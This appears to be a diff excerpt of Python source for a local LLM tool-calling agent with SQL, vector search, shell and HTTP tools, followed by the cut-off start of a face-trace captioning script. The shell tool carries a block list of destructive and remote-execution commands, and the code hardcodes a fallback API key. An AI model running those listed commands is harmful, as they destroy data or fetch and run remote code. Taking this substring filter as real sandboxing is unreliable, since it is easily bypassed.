- call_api: HTTP API calls
|
||||
|
||||
Version: 1.1.0
|
||||
Updated: 2026-07-26
|
||||
Changes:
|
||||
- Added embedding server health check
|
||||
- Enhanced bash safety patterns
|
||||
- Added logging support
|
||||
- Environment variable for Qdrant collection
|
||||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
import re
|
||||
import subprocess
|
||||
import requests
|
||||
from typing import Any, Callable, Dict, List, Optional, Tuple
|
||||
from dataclasses import dataclass
|
||||
from datetime import datetime, date
|
||||
|
||||
# Configure logging
|
||||
logging.basicConfig(
|
||||
level=logging.INFO,
|
||||
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
|
||||
)
|
||||
logger = logging.getLogger('tool_caller')
|
||||
|
||||
|
||||
class DateTimeEncoder(json.JSONEncoder):
|
||||
"""Custom JSON encoder for datetime objects"""
|
||||
def default(self, obj):
|
||||
if isinstance(obj, (datetime, date)):
|
||||
return obj.isoformat()
|
||||
return super().default(obj)
|
||||
|
||||
|
||||
@dataclass
|
||||
class ToolResult:
|
||||
"""Result from tool execution"""
|
||||
success: bool
|
||||
data: Any
|
||||
error: Optional[str] = None
|
||||
execution_time_ms: float = 0
|
||||
|
||||
|
||||
class ToolRegistry:
|
||||
"""Registry for available tools"""
|
||||
|
||||
def __init__(self):
|
||||
self._tools: Dict[str, Dict[str, Any]] = {}
|
||||
self._executors: Dict[str, Callable] = {}
|
||||
|
||||
def register(
|
||||
self,
|
||||
name: str,
|
||||
description: str,
|
||||
parameters: Dict[str, Any],
|
||||
executor: Callable[[Dict[str, Any]], ToolResult]
|
||||
):
|
||||
"""Register a new tool"""
|
||||
self._tools[name] = {
|
||||
"type": "function",
|
||||
"function": {
|
||||
"name": name,
|
||||
"description": description,
|
||||
"parameters": parameters
|
||||
}
|
||||
}
|
||||
self._executors[name] = executor
|
||||
logger.debug(f"Registered tool: {name}")
|
||||
|
||||
def get_definitions(self) -> List[Dict[str, Any]]:
|
||||
"""Get all tool definitions for API calls"""
|
||||
return list(self._tools.values())
|
||||
|
||||
def has_tool(self, name: str) -> bool:
|
||||
"""Check if tool exists"""
|
||||
return name in self._executors
|
||||
|
||||
def execute(self, name: str, arguments: Dict[str, Any]) -> ToolResult:
|
||||
"""Execute a tool by name"""
|
||||
if name not in self._executors:
|
||||
logger.error(f"Unknown tool: {name}")
|
||||
return ToolResult(
|
||||
success=False,
|
||||
data=None,
|
||||
error=f"Unknown tool: {name}"
|
||||
)
|
||||
|
||||
start_time = datetime.now()
|
||||
logger.info(f"Executing tool: {name} with args: {json.dumps(arguments, ensure_ascii=False)[:200]}")
|
||||
|
||||
try:
|
||||
result = self._executors[name](arguments)
|
||||
elapsed = (datetime.now() - start_time).total_seconds() * 1000
|
||||
result.execution_time_ms = elapsed
|
||||
|
||||
if result.success:
|
||||
logger.info(f"Tool {name} succeeded in {elapsed:.1f}ms")
|
||||
else:
|
||||
logger.error(f"Tool {name} failed: {result.error}")
|
||||
|
||||
return result
|
||||
except Exception as e:
|
||||
elapsed = (datetime.now() - start_time).total_seconds() * 1000
|
||||
logger.error(f"Tool {name} exception: {e}")
|
||||
return ToolResult(
|
||||
success=False,
|
||||
data=None,
|
||||
error=str(e),
|
||||
execution_time_ms=elapsed
|
||||
)
|
||||
|
||||
|
||||
class OllamaToolCaller:
|
||||
"""Tool caller using Ollama API with improved stability"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
base_url: str = "http://localhost:11434",
|
||||
model: str = "llama3.1:8b",
|
||||
max_iterations: int = 10,
|
||||
max_tool_calls: int = 5
|
||||
):
|
||||
self.base_url = base_url
|
||||
self.model = model
|
||||
self.max_iterations = max_iterations
|
||||
self.max_tool_calls = max_tool_calls
|
||||
self.registry = ToolRegistry()
|
||||
|
||||
# System prompt optimized for tool calling
|
||||
self.system_prompt = """You are a data assistant with access to tools.
|
||||
|
||||
CORE RULES:
|
||||
1. When you receive a tool result, you MUST provide a final answer - do NOT call more tools
|
||||
2. Call exactly ONE tool per response
|
||||
3. Answer based on tool results, not assumptions
|
||||
4. If tool fails, report the error and stop
|
||||
|
||||
IMPORTANT: After receiving ANY tool result, respond with a clear answer to the user."""
|
||||
|
||||
# Track tool calls for loop prevention
|
||||
self._tool_call_history: List[str] = []
|
||||
|
||||
logger.info(f"Initialized OllamaToolCaller with model={model}")
|
||||
|
||||
def chat(self, messages: List[Dict[str, Any]]) -> Dict[str, Any]:
|
||||
"""Send chat request to Ollama"""
|
||||
url = f"{self.base_url}/api/chat"
|
||||
payload = {
|
||||
"model": self.model,
|
||||
"messages": messages,
|
||||
"tools": self.registry.get_definitions(),
|
||||
"stream": False
|
||||
}
|
||||
|
||||
logger.debug(f"Sending chat request to {url}")
|
||||
response = requests.post(url, json=payload, timeout=120)
|
||||
response.raise_for_status()
|
||||
return response.json()
|
||||
|
||||
def execute_tool_call(self, tool_call: Dict[str, Any]) -> ToolResult:
|
||||
"""Execute a single tool call with flexible argument parsing"""
|
||||
func = tool_call.get("function", {})
|
||||
name = func.get("name", "")
|
||||
|
||||
# Handle both dict and string arguments
|
||||
arguments = func.get("arguments", {})
|
||||
if isinstance(arguments, str):
|
||||
try:
|
||||
arguments = json.loads(arguments)
|
||||
except json.JSONDecodeError:
|
||||
arguments = {}
|
||||
|
||||
# Normalize arguments based on tool name
|
||||
arguments = self._normalize_arguments(name, arguments)
|
||||
|
||||
return self.registry.execute(name, arguments)
|
||||
|
||||
def _normalize_arguments(self, tool_name: str, args: Dict[str, Any]) -> Dict[str, Any]:
|
||||
"""Normalize arguments to match expected format"""
|
||||
if not args:
|
||||
return args
|
||||
|
||||
# For query_postgres, ensure we have 'query' parameter
|
||||
if tool_name == "query_postgres":
|
||||
if "query" not in args:
|
||||
for key in ["query_text", "sql", "sql_query", "statement"]:
|
||||
if key in args:
|
||||
args["query"] = args[key]
|
||||
break
|
||||
|
||||
# For search_qdrant, ensure we have 'query_text' parameter
|
||||
elif tool_name == "search_qdrant":
|
||||
if "query_text" not in args:
|
||||
for key in ["query", "search", "text"]:
|
||||
if key in args:
|
||||
args["query_text"] = args[key]
|
||||
break
|
||||
|
||||
return args
|
||||
|
||||
def _get_tool_key(self, name: str, arguments: Any) -> str:
|
||||
"""Generate unique key for tool call"""
|
||||
if isinstance(arguments, str):
|
||||
try:
|
||||
arguments = json.loads(arguments)
|
||||
except:
|
||||
arguments = {"raw": arguments}
|
||||
return f"{name}:{json.dumps(arguments, sort_keys=True)}"
|
||||
|
||||
def _is_duplicate_call(self, tool_key: str) -> bool:
|
||||
"""Check if this tool call was already made"""
|
||||
is_dup = tool_key in self._tool_call_history
|
||||
if is_dup:
|
||||
logger.warning(f"Duplicate tool call detected: {tool_key[:50]}")
|
||||
return is_dup
|
||||
|
||||
def _add_to_history(self, tool_key: str):
|
||||
"""Add tool call to history"""
|
||||
self._tool_call_history.append(tool_key)
|
||||
|
||||
def _extract_tool_from_text(self, text: str) -> Optional[Tuple[str, Dict[str, Any]]]:
|
||||
"""Extract tool call from text content (when model outputs JSON instead of tool_calls)"""
|
||||
if not text or '{"name":' not in text:
|
||||
return None
|
||||
|
||||
try:
|
||||
start_idx = text.find('{"name":')
|
||||
if start_idx == -1:
|
||||
return None
|
||||
|
||||
# Find the end of the JSON object
|
||||
depth = 0
|
||||
end_idx = start_idx
|
||||
for i in range(start_idx, len(text)):
|
||||
if text[i] == '{':
|
||||
depth += 1
|
||||
elif text[i] == '}':
|
||||
depth -= 1
|
||||
if depth == 0:
|
||||
end_idx = i + 1
|
||||
break
|
||||
|
||||
if end_idx > start_idx:
|
||||
json_str = text[start_idx:end_idx]
|
||||
# Fix common JSON issues
|
||||
json_str = json_str.replace('\\ ', ' ')
|
||||
json_str = json_str.replace('\\n', '\n')
|
||||
|
||||
tool_data = json.loads(json_str)
|
||||
if 'name' in tool_data:
|
||||
name = tool_data['name']
|
||||
params = tool_data.get('parameters', tool_data.get('arguments', {}))
|
||||
if self.registry.has_tool(name):
|
||||
logger.debug(f"Extracted tool from text: {name}")
|
||||
return (name, params)
|
||||
except Exception as e:
|
||||
logger.debug(f"Failed to extract tool from text: {e}")
|
||||
|
||||
return None
|
||||
|
||||
def _force_answer(self, messages: List[Dict[str, Any]], tool_results: str) -> str:
|
||||
"""Force the model to provide a final answer based on tool results"""
|
||||
messages.append({
|
||||
"role": "user",
|
||||
"content": f"Based on the tool results above, please provide your final answer now. Do not call any more tools.\n\nTool results:\n{tool_results}"
|
||||
})
|
||||
|
||||
url = f"{self.base_url}/api/chat"
|
||||
payload = {
|
||||
"model": self.model,
|
||||
"messages": messages,
|
||||
"stream": False
|
||||
}
|
||||
|
||||
try:
|
||||
logger.info("Forcing final answer from model")
|
||||
response = requests.post(url, json=payload, timeout=120)
|
||||
response.raise_for_status()
|
||||
return response.json().get("message", {}).get("content", "Unable to generate answer.")
|
||||
except Exception as e:
|
||||
logger.error(f"Failed to force answer: {e}")
|
||||
return f"Tool execution completed. Results: {tool_results}"
|
||||
|
||||
def run(self, user_query: str) -> str:
|
||||
"""
|
||||
Run tool calling loop with user query.
|
||||
|
||||
Args:
|
||||
user_query: The user's question or request
|
||||
|
||||
Returns:
|
||||
Final text response from the model
|
||||
"""
|
||||
logger.info(f"Starting tool call loop for query: {user_query[:100]}")
|
||||
self._tool_call_history = []
|
||||
|
||||
messages = [
|
||||
{"role": "system", "content": self.system_prompt},
|
||||
{"role": "user", "content": user_query}
|
||||
]
|
||||
|
||||
tool_results_collected = []
|
||||
|
||||
for iteration in range(self.max_iterations):
|
||||
logger.info(f"Iteration {iteration + 1}/{self.max_iterations}")
|
||||
|
||||
# Call LLM
|
||||
response = self.chat(messages)
|
||||
|
||||
message = response.get("message", {})
|
||||
content = message.get("content", "")
|
||||
tool_calls = message.get("tool_calls", [])
|
||||
|
||||
# If no tool calls in response, check if content has text tool call
|
||||
if not tool_calls:
|
||||
extracted = self._extract_tool_from_text(content)
|
||||
if extracted:
|
||||
name, params = extracted
|
||||
tool_key = self._get_tool_key(name, params)
|
||||
|
||||
if not self._is_duplicate_call(tool_key):
|
||||
self._add_to_history(tool_key)
|
||||
tool_call = {"function": {"name": name, "arguments": params}}
|
||||
tool_result = self.execute_tool_call(tool_call)
|
||||
|
||||
# Build result string with error handling
|
||||
if tool_result.success:
|
||||
result_str = json.dumps({
|
||||
"success": True,
|
||||
"data": tool_result.data
|
||||
}, ensure_ascii=False, cls=DateTimeEncoder)
|
||||
else:
|
||||
result_str = json.dumps({
|
||||
"success": False,
|
||||
"error": tool_result.error,
|
||||
"suggestion": "Try a different tool or rephrase your query."
|
||||
}, ensure_ascii=False)
|
||||
|
||||
messages.append({"role": "assistant", "content": "", "tool_calls": [tool_call]})
|
||||
messages.append({"role": "user", "content": f"Tool result: {result_str}"})
|
||||
tool_results_collected.append(f"{name}: {result_str[:500]}")
|
||||
continue
|
||||
|
||||
# No tool call - return content
|
||||
if content:
|
||||
logger.info(f"Returning final answer after {iteration + 1} iterations")
|
||||
return content
|
||||
else:
|
||||
return self._force_answer(messages, "\n".join(tool_results_collected) if tool_results_collected else "No tool was called")
|
||||
|
||||
# Execute first tool call (sequential)
|
||||
tool_call = tool_calls[0]
|
||||
func = tool_call.get("function", {})
|
||||
tool_name = func.get("name", "")
|
||||
arguments = func.get("arguments", {})
|
||||
|
||||
tool_key = self._get_tool_key(tool_name, arguments)
|
||||
|
||||
# Check for duplicate
|
||||
if self._is_duplicate_call(tool_key):
|
||||
return self._force_answer(messages, "\n".join(tool_results_collected) if tool_results_collected else "Tool already executed")
|
||||
|
||||
# Track and execute
|
||||
self._add_to_history(tool_key)
|
||||
tool_result = self.execute_tool_call(tool_call)
|
||||
|
||||
# Check if we've hit the tool call limit
|
||||
if len(self._tool_call_history) >= self.max_tool_calls:
|
||||
if tool_result.success:
|
||||
result_str = json.dumps({
|
||||
"success": True,
|
||||
"data": tool_result.data
|
||||
}, ensure_ascii=False, cls=DateTimeEncoder)
|
||||
else:
|
||||
result_str = json.dumps({
|
||||
"success": False,
|
||||
"error": tool_result.error,
|
||||
"suggestion": "Try a different tool or rephrase your query."
|
||||
}, ensure_ascii=False)
|
||||
|
||||
tool_results_collected.append(f"{tool_name}: {result_str[:500]}")
|
||||
return self._force_answer(messages, "\n".join(tool_results_collected))
|
||||
|
||||
# Add to messages
|
||||
messages.append({"role": "assistant", "content": "", "tool_calls": [tool_call]})
|
||||
|
||||
if tool_result.success:
|
||||
result_str = json.dumps({
|
||||
"success": True,
|
||||
"data": tool_result.data
|
||||
}, ensure_ascii=False, cls=DateTimeEncoder)
|
||||
else:
|
||||
result_str = json.dumps({
|
||||
"success": False,
|
||||
"error": tool_result.error,
|
||||
"suggestion": "Try a different tool or rephrase your query."
|
||||
}, ensure_ascii=False)
|
||||
|
||||
messages.append({"role": "user", "content": f"Tool result: {result_str}"})
|
||||
tool_results_collected.append(f"{tool_name}: {result_str[:500]}")
|
||||
|
||||
# Max iterations reached
|
||||
logger.warning(f"Max iterations ({self.max_iterations}) reached")
|
||||
return self._force_answer(messages, "\n".join(tool_results_collected) if tool_results_collected else "Max iterations reached")
|
||||
|
||||
def register_default_tools(self, db_url: str = None, qdrant_url: str = None):
|
||||
"""Register default tools with connection strings"""
|
||||
|
||||
# Get default collection from environment variable
|
||||
default_collection = os.environ.get("QDRANT_DEFAULT_COLLECTION", "momentry_rule1")
|
||||
logger.info(f"Using default Qdrant collection: {default_collection}")
|
||||
|
||||
# PostgreSQL tool
|
||||
def query_postgres(args: Dict[str, Any]) -> ToolResult:
|
||||
import psycopg2
|
||||
import psycopg2.extras
|
||||
|
||||
query = args.get("query", "")
|
||||
if not query:
|
||||
return ToolResult(success=False, data=None, error="No query provided")
|
||||
|
||||
logger.info(f"Executing PostgreSQL query: {query[:100]}")
|
||||
|
||||
conn = psycopg2.connect(db_url or "postgres://accusys@localhost:5432/momentry")
|
||||
try:
|
||||
with conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor) as cur:
|
||||
cur.execute(query)
|
||||
if cur.description:
|
||||
rows = cur.fetchall()
|
||||
logger.info(f"Query returned {len(rows)} rows")
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data={"rows": [dict(r) for r in rows], "row_count": len(rows)}
|
||||
)
|
||||
else:
|
||||
conn.commit()
|
||||
logger.info(f"Query affected {cur.rowcount} rows")
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data={"affected_rows": cur.rowcount}
|
||||
)
|
||||
finally:
|
||||
conn.close()
|
||||
|
||||
self.registry.register(
|
||||
name="query_postgres",
|
||||
description="Execute SQL query on PostgreSQL database. Use SELECT for queries, INSERT/UPDATE/DELETE for modifications.",
|
||||
parameters={
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"query": {
|
||||
"type": "string",
|
||||
"description": "SQL query to execute"
|
||||
}
|
||||
},
|
||||
"required": ["query"]
|
||||
},
|
||||
executor=query_postgres
|
||||
)
|
||||
|
||||
# Qdrant tool with health check
|
||||
def search_qdrant(args: Dict[str, Any]) -> ToolResult:
|
||||
import requests as req
|
||||
|
||||
collection = args.get("collection", default_collection)
|
||||
query_text = args.get("query_text", "")
|
||||
limit = args.get("limit", 10)
|
||||
|
||||
# Get Qdrant API key from args or environment
|
||||
api_key = args.get("api_key") or os.environ.get("QDRANT_API_KEY", "Test3200Test3200Test3200")
|
||||
|
||||
if not query_text:
|
||||
return ToolResult(success=False, data=None, error="No query text provided")
|
||||
|
||||
logger.info(f"Searching Qdrant collection '{collection}' for: {query_text[:50]}")
|
||||
|
||||
# Check embedding server health
|
||||
try:
|
||||
embed_health = req.get("http://localhost:11436/health", timeout=5)
|
||||
if embed_health.status_code != 200:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
data=None,
|
||||
error=f"Embedding server not healthy (status={embed_health.status_code})"
|
||||
)
|
||||
except req.exceptions.ConnectionError:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
data=None,
|
||||
error="Embedding server not available at http://localhost:11436"
|
||||
)
|
||||
except Exception as e:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
data=None,
|
||||
error=f"Embedding server health check failed: {str(e)}"
|
||||
)
|
||||
|
||||
# Get embedding
|
||||
try:
|
||||
embed_url = "http://localhost:11436/v1/embeddings"
|
||||
embed_resp = req.post(embed_url, json={"input": query_text}, timeout=30)
|
||||
embed_resp.raise_for_status()
|
||||
embed_data = embed_resp.json()
|
||||
# Handle both response formats
|
||||
if "data" in embed_data:
|
||||
embedding = embed_data["data"][0]["embedding"]
|
||||
elif "embeddings" in embed_data:
|
||||
embedding = embed_data["embeddings"][0]
|
||||
else:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
data=None,
|
||||
error=f"Unexpected embedding response format: {list(embed_data.keys())}"
|
||||
)
|
||||
logger.info(f"Generated embedding (dim={len(embedding)})")
|
||||
except Exception as e:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
data=None,
|
||||
error=f"Embedding generation failed: {str(e)}"
|
||||
)
|
||||
|
||||
# Check Qdrant collection exists
|
||||
qdrant_url_base = qdrant_url or "http://localhost:6333"
|
||||
headers = {"api-key": api_key}
|
||||
try:
|
||||
collections_url = f"{qdrant_url_base}/collections"
|
||||
coll_resp = req.get(collections_url, headers=headers, timeout=10)
|
||||
coll_resp.raise_for_status()
|
||||
collections = [c["name"] for c in coll_resp.json().get("result", {}).get("collections", [])]
|
||||
logger.info(f"Available Qdrant collections: {collections}")
|
||||
|
||||
if collection not in collections:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
data=None,
|
||||
error=f"Collection '{collection}' not found. Available: {', '.join(collections)}"
|
||||
)
|
||||
except Exception as e:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
data=None,
|
||||
error=f"Qdrant connection failed: {str(e)}"
|
||||
)
|
||||
|
||||
# Execute search
|
||||
search_url = f"{qdrant_url_base}/collections/{collection}/points/search"
|
||||
search_payload = {"vector": embedding, "limit": limit, "with_payload": True}
|
||||
|
||||
try:
|
||||
search_resp = req.post(search_url, json=search_payload, headers=headers, timeout=30)
|
||||
search_resp.raise_for_status()
|
||||
results = search_resp.json().get("result", [])
|
||||
logger.info(f"Qdrant returned {len(results)} matches")
|
||||
except Exception as e:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
data=None,
|
||||
error=f"Qdrant search failed: {str(e)}"
|
||||
)
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data={
|
||||
"matches": [
|
||||
{"id": r.get("id"), "score": r.get("score"), "payload": r.get("payload", {})}
|
||||
for r in results
|
||||
],
|
||||
"match_count": len(results)
|
||||
}
|
||||
)
|
||||
|
||||
self.registry.register(
|
||||
name="search_qdrant",
|
||||
description=f"Search for similar vectors in Qdrant collection. Default collection: {default_collection}",
|
||||
parameters={
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"collection": {
|
||||
"type": "string",
|
||||
"description": f"Qdrant collection name (default: {default_collection})",
|
||||
"default": default_collection
|
||||
},
|
||||
"query_text": {
|
||||
"type": "string",
|
||||
"description": "Search query text (will be embedded)"
|
||||
},
|
||||
"limit": {
|
||||
"type": "integer",
|
||||
"description": "Maximum number of results",
|
||||
"default": 10
|
||||
}
|
||||
},
|
||||
"required": ["query_text"]
|
||||
},
|
||||
executor=search_qdrant
|
||||
)
|
||||
|
||||
# Bash tool with enhanced safety
|
||||
def execute_bash(args: Dict[str, Any]) -> ToolResult:
|
||||
command = args.get("command", "")
|
||||
timeout = args.get("timeout", 30)
|
||||
|
||||
if not command:
|
||||
return ToolResult(success=False, data=None, error="No command provided")
|
||||
|
||||
# Limit command length
|
||||
if len(command) > 2000:
|
||||
return ToolResult(success=False, data=None, error="Command too long (max 2000 chars)")
|
||||
|
||||
logger.info(f"Executing bash command: {command[:100]}")
|
||||
|
||||
# Enhanced safety patterns
|
||||
blocked_patterns = [
|
||||
# File system destruction
|
||||
"rm -rf /", "rm -rf /*", "mkfs", "dd if=", "> /dev/",
|
||||
# Permission escalation
|
||||
"sudo ", "su -", "chmod 777", "chown root",
|
||||
# Remote execution
|
||||
"curl | bash", "curl | sh", "wget | sh", "wget | bash",
|
||||
"curl http", "wget http",
|
||||
# Fork bomb / DoS
|
||||
":(){", "fork", "kill -9 1",
|
||||
# Network listeners
|
||||
"nc -l", "netcat -l", "socat",
|
||||
# Process killing
|
||||
"killall", "pkill",
|
||||
# Disk operations
|
||||
"fdisk", "parted",
|
||||
]
|
||||
|
||||
command_lower = command.lower()
|
||||
for pattern in blocked_patterns:
|
||||
if pattern in command_lower:
|
||||
logger.warning(f"Blocked dangerous command pattern: {pattern}")
|
||||
return ToolResult(
|
||||
success=False,
|
||||
data=None,
|
||||
error=f"Blocked dangerous command pattern: {pattern}"
|
||||
)
|
||||
|
||||
try:
|
||||
result = subprocess.run(
|
||||
command,
|
||||
shell=True,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=timeout
|
||||
)
|
||||
logger.info(f"Command completed with return code: {result.returncode}")
|
||||
return ToolResult(
|
||||
success=result.returncode == 0,
|
||||
data={
|
||||
"stdout": result.stdout[:5000],
|
||||
"stderr": result.stderr[:2000],
|
||||
"returncode": result.returncode
|
||||
}
|
||||
)
|
||||
except subprocess.TimeoutExpired:
|
||||
logger.error(f"Command timed out after {timeout}s")
|
||||
return ToolResult(
|
||||
success=False,
|
||||
data=None,
|
||||
error=f"Command timed out after {timeout}s"
|
||||
)
|
||||
|
||||
self.registry.register(
|
||||
name="execute_bash",
|
||||
description="Execute a bash command on the system. Use for file operations, system checks, etc.",
|
||||
parameters={
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"command": {
|
||||
"type": "string",
|
||||
"description": "Bash command to execute"
|
||||
},
|
||||
"timeout": {
|
||||
"type": "integer",
|
||||
"description": "Timeout in seconds",
|
||||
"default": 30
|
||||
}
|
||||
},
|
||||
"required": ["command"]
|
||||
},
|
||||
executor=execute_bash
|
||||
)
|
||||
|
||||
# API tool
|
||||
def call_api(args: Dict[str, Any]) -> ToolResult:
|
||||
import requests as req
|
||||
|
||||
url = args.get("url", "")
|
||||
method = args.get("method", "GET").upper()
|
||||
headers = args.get("headers", {})
|
||||
data = args.get("data")
|
||||
|
||||
if not url:
|
||||
return ToolResult(success=False, data=None, error="No URL provided")
|
||||
|
||||
logger.info(f"Calling API: {method} {url[:100]}")
|
||||
|
||||
try:
|
||||
if method == "GET":
|
||||
resp = req.get(url, headers=headers, timeout=30)
|
||||
elif method == "POST":
|
||||
resp = req.post(url, json=data, headers=headers, timeout=30)
|
||||
elif method == "PUT":
|
||||
resp = req.put(url, json=data, headers=headers, timeout=30)
|
||||
elif method == "DELETE":
|
||||
resp = req.delete(url, headers=headers, timeout=30)
|
||||
else:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
data=None,
|
||||
error=f"Unsupported method: {method}"
|
||||
)
|
||||
|
||||
logger.info(f"API response: {resp.status_code}")
|
||||
return ToolResult(
|
||||
success=resp.status_code < 400,
|
||||
data={
|
||||
"status_code": resp.status_code,
|
||||
"headers": dict(resp.headers),
|
||||
"body": resp.text[:10000]
|
||||
}
|
||||
)
|
||||
except Exception as e:
|
||||
logger.error(f"API call failed: {e}")
|
||||
return ToolResult(success=False, data=None, error=str(e))
|
||||
|
||||
self.registry.register(
|
||||
name="call_api",
|
||||
description="Call an external HTTP API endpoint. Use for REST API interactions.",
|
||||
parameters={
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"url": {
|
||||
"type": "string",
|
||||
"description": "API endpoint URL"
|
||||
},
|
||||
"method": {
|
||||
"type": "string",
|
||||
"enum": ["GET", "POST", "PUT", "DELETE"],
|
||||
"description": "HTTP method",
|
||||
"default": "GET"
|
||||
},
|
||||
"headers": {
|
||||
"type": "object",
|
||||
"description": "HTTP headers"
|
||||
},
|
||||
"data": {
|
||||
"type": "object",
|
||||
"description": "Request body for POST/PUT"
|
||||
}
|
||||
},
|
||||
"required": ["url"]
|
||||
},
|
||||
executor=call_api
|
||||
)
|
||||
|
||||
|
||||
def main():
|
||||
"""Example usage"""
|
||||
caller = OllamaToolCaller()
|
||||
caller.register_default_tools()
|
||||
|
||||
query = "How many videos are in the database?"
|
||||
print(f"Query: {query}")
|
||||
print("-" * 50)
|
||||
|
||||
result = caller.run(query)
|
||||
print(f"Result: {result}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
Executable
+345
@@ -0,0 +1,345 @@
|
||||
#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
Trace VLM Caption - Generate VLM descriptions for face traces
|
||||
|
||||
Analyzes key_face.jpg or key_frame.jpg using VLM (llava:7b) and updates trace_profile.json.
|
||||
|
||||
Usage:
|
||||
python trace_vlm_caption.py --trace-dir /path/to/output/{uuid}/trace_0
|
||||
python trace_vlm_caption.py --file-uuid abc123 --trace-id 0 --output-dir /path/to/output
|
||||
|
||||
Output (13 fields):
|
||||
Person: vlm_description, vlm_clothing, vlm_tags, vlm_hand_objects
|
||||
Environment: vlm_lighting, vlm_location, vlm_weather, vlm_setting, vlm_transportation
|
||||
Nature: vlm_has_plants, vlm_plants, vlm_has_animals, vlm_animals
|
||||
Context: vlm_background, vlm_bg_tags
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import base64
|
||||
import json
|
||||
import os
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
try:
|
||||
import requests
|
||||
except ImportError:
|
||||
print("requests not installed: pip install requests", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
def encode_image(image_path: str) -> str:
|
||||
"""Encode image to base64."""
|
||||
with open(image_path, "rb") as f:
|
||||
return base64.b64encode(f.read()).decode("utf-8")
|
||||
|
||||
|
||||
def call_vlm(image_path: str, prompt: str, model: str = "llava:7b", ollama_url: str = "http://localhost:11434") -> str:
|
||||
"""Call Ollama VLM API."""
|
||||
image_b64 = encode_image(image_path)
|
||||
|
||||
payload = {
|
||||
"model": model,
|
||||
"prompt": prompt,
|
||||
"images": [image_b64],
|
||||
"stream": False,
|
||||
"options": {"num_predict": 100}
|
||||
}
|
||||
|
||||
try:
|
||||
resp = requests.post(f"{ollama_url}/api/generate", json=payload, timeout=30)
|
||||
resp.raise_for_status()
|
||||
data = resp.json()
|
||||
return data.get("response", "").strip()
|
||||
except Exception as e:
|
||||
print(f"VLM API error: {e}", file=sys.stderr)
|
||||
return ""
|
||||
|
||||
|
||||
def get_embedding(text: str, model: str = "nomic-embed-text-v2-moe", ollama_url: str = "http://localhost:11434") -> list:
|
||||
"""Get embedding from Ollama."""
|
||||
try:
|
||||
resp = requests.post(
|
||||
f"{ollama_url}/api/embed",
|
||||
json={"model": model, "input": text},
|
||||
timeout=30,
|
||||
)
|
||||
resp.raise_for_status()
|
||||
data = resp.json()
|
||||
return data.get("embeddings", [[]])[0]
|
||||
except Exception as e:
|
||||
print(f"[vlm] Embedding error: {e}", file=sys.stderr)
|
||||
return []
|
||||
|
||||
|
||||
def store_to_qdrant(profile: dict, file_uuid: str, trace_id: int, qdrant_url: str = "http://localhost:6333", qdrant_api_key: str = None) -> bool:
|
||||
"""Store VLM results to Qdrant _vlm collection."""
|
||||
description = profile.get("vlm_description", "")
|
||||
if not description:
|
||||
return False
|
||||
|
||||
# Get embedding
|
||||
embedding = get_embedding(description)
|
||||
if not embedding:
|
||||
print(f"[vlm] Failed to get embedding for trace_{trace_id}", file=sys.stderr)
|
||||
return False
|
||||
|
||||
# Generate point ID from file_uuid + trace_id
|
||||
import hashlib
|
||||
point_id = int(hashlib.md5(f"{file_uuid}_trace_{trace_id}".encode()).hexdigest()[:16], 16)
|
||||
|
||||
# Build payload
|
||||
payload = {
|
||||
"type": "trace",
|
||||
"file_uuid": file_uuid,
|
||||
"trace_id": trace_id,
|
||||
"vlm_description": profile.get("vlm_description", ""),
|
||||
"vlm_clothing": profile.get("vlm_clothing", ""),
|
||||
"vlm_tags": profile.get("vlm_tags", []),
|
||||
"vlm_hand_objects": profile.get("vlm_hand_objects", ""),
|
||||
"vlm_lighting": profile.get("vlm_lighting", "unknown"),
|
||||
"vlm_location": profile.get("vlm_location", "unknown"),
|
||||
"vlm_weather": profile.get("vlm_weather", "unknown"),
|
||||
"vlm_setting": profile.get("vlm_setting", "unknown"),
|
||||
"vlm_transportation": profile.get("vlm_transportation", "unknown"),
|
||||
"vlm_has_plants": profile.get("vlm_has_plants", False),
|
||||
"vlm_plants": profile.get("vlm_plants", []),
|
||||
"vlm_has_animals": profile.get("vlm_has_animals", False),
|
||||
"vlm_animals": profile.get("vlm_animals", []),
|
||||
"vlm_background": profile.get("vlm_background", ""),
|
||||
"vlm_bg_tags": profile.get("vlm_bg_tags", []),
|
||||
"vlm_model": profile.get("vlm_model", ""),
|
||||
}
|
||||
|
||||
# Upsert to Qdrant
|
||||
try:
|
||||
headers = {}
|
||||
if qdrant_api_key:
|
||||
headers["api-key"] = qdrant_api_key
|
||||
|
||||
resp = requests.put(
|
||||
f"{qdrant_url}/collections/_vlm/points?wait=true",
|
||||
json={
|
||||
"points": [{
|
||||
"id": point_id,
|
||||
"vector": embedding,
|
||||
"payload": payload,
|
||||
}]
|
||||
},
|
||||
headers=headers,
|
||||
timeout=30,
|
||||
)
|
||||
resp.raise_for_status()
|
||||
print(f"[vlm] Stored to Qdrant: trace_{trace_id}")
|
||||
return True
|
||||
except Exception as e:
|
||||
print(f"[vlm] Qdrant error: {e}", file=sys.stderr)
|
||||
return False
|
||||
|
||||
|
||||
def analyze_trace(trace_dir: str, model: str = "llava:7b", store_qdrant: bool = True) -> dict:
|
||||
"""
|
||||
Analyze a face trace with VLM.
|
||||
|
||||
Returns:
|
||||
Dict with VLM analysis results
|
||||
"""
|
||||
trace_path = Path(trace_dir)
|
||||
